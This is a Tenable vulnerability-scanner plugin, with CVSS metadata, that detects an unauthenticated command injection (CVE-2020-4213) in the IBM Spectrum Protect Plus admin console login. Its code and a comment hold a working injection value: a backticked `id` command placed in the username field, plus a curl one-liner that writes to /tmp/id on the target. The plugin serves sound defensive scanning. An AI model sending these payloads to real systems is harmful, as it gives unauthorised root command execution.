CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.3%
The IBM Spectrum Protect Plus administrative console running on the remote host is affected by a remote command injection vulnerability due to improper validation of user-supplied data when processing a login HTTP request. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to execute arbitrary code on the system with root privileges.
Note that the application is reportedly affected by other vulnerabilities; however, this plugin has not tested for those issues.
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
if (description)
{
script_id(135852);
script_version("1.2");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/23");
script_cve_id("CVE-2020-4213");
script_xref(name:"ZDI", value:"ZDI-20-270");
script_name(english:"IBM Spectrum Protect Plus username Command Injection");
script_set_attribute(attribute:"synopsis", value:
"A web application running on the remote host is affected by a
remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The IBM Spectrum Protect Plus administrative console running on the
remote host is affected by a remote command injection vulnerability
due to improper validation of user-supplied data when processing a
login HTTP request. An unauthenticated, remote attacker can exploit
this, via a specially crafted HTTP request, to execute arbitrary code
on the system with root privileges.
Note that the application is reportedly affected by other
vulnerabilities; however, this plugin has not tested for those issues.");
script_set_attribute(attribute:"see_also", value:"https://www.ibm.com/support/pages/node/3178863");
script_set_attribute(attribute:"solution", value:
"Update the IBM Spectrum Protect Plus RPM package spp-emi to
10.1.5-217 or later. That spp-emi package should be in the IBM
Spectrum Protect Plus 10.1.5 patch1.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-4213");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"vuln_publication_date", value:"2020/02/21");
script_set_attribute(attribute:"patch_publication_date", value:"2020/02/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/04/21");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:spectrum_protect_plus");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"General");
script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ibm_spp_admin_console_detect.nbin");
script_require_keys("installed_sw/IBM Spectrum Protect Plus Administrative Console");
script_require_ports("Services/www", 8090);
exit(0);
}
include('http.inc');
include('json.inc');
include('webapp_func.inc');
app = 'IBM Spectrum Protect Plus Administrative Console';
# Exit if app is not detected on the host.
get_install_count(app_name:app, exit_if_zero:TRUE);
# Exit if app is not detected on this www port.
port = get_service(svc:'www', exit_on_fail:TRUE);
get_single_install(app_name:app, port:port);
url = '/emi/api/login';
# To confirm the vulnerability, use the following CURL command:
#
# curl -ki --tlsv1.2 -d 'ltype=product&username=`id>/tmp/id`&password=bar'
# 'https://<target_host>:8090/emi/api/login/'
#
# and check if /tmp/id is created on the target host.
data = 'ltype=product&username=`id`&password=AAAAAAAA';
res = http_send_recv3(
port : port,
method : 'POST',
item : url,
data : data,
content_type : 'application/x-www-form-urlencoded',
exit_on_fail : TRUE
);
if(' 200 ' >!< res[0])
audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected HTTP response status ' + chomp(res[0]));
if(empty_or_null(res[2]))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No HTTP response data');
json = json_read(res[2]);
if(isnull(json[1]))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No JSON data in HTTP response');
authoutput = json[0].authoutput;
if(empty_or_null(authoutput))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No authoutput in HTTP response');
exception = authoutput.exceptionDescription;
if(empty_or_null(exception))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No exceptionDescription in authoutput');
# Patched server uses REST API to perform user login as opposed to
# using the CURL command.
#
# Patched response:
# {"authoutput":{"returnCode":null,"sessionId":null,"exceptionId":null,"exceptionDescription":"org.springframework.web.client.HttpClientErrorException: 401 null","licenseOutput":null}}
if('org.springframework.web.client.HttpClientErrorException' >< exception)
audit(AUDIT_LISTEN_NOT_VULN, app, port);
#
# Vulnerable response:
# {"authoutput":{"returnCode":"0","sessionId":null,"exceptionId":"XSBAuthenticationException","exceptionDescription":"Login has failed due to incorrect user name or password. Try again.","licenseOutput":null}}
else if ('Login has failed due to incorrect user name' >< exception)
{
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
request : make_list(http_last_sent_request()),
output : res[2]
);
}
else
audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected exceptionDescription in authoutput');
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.3%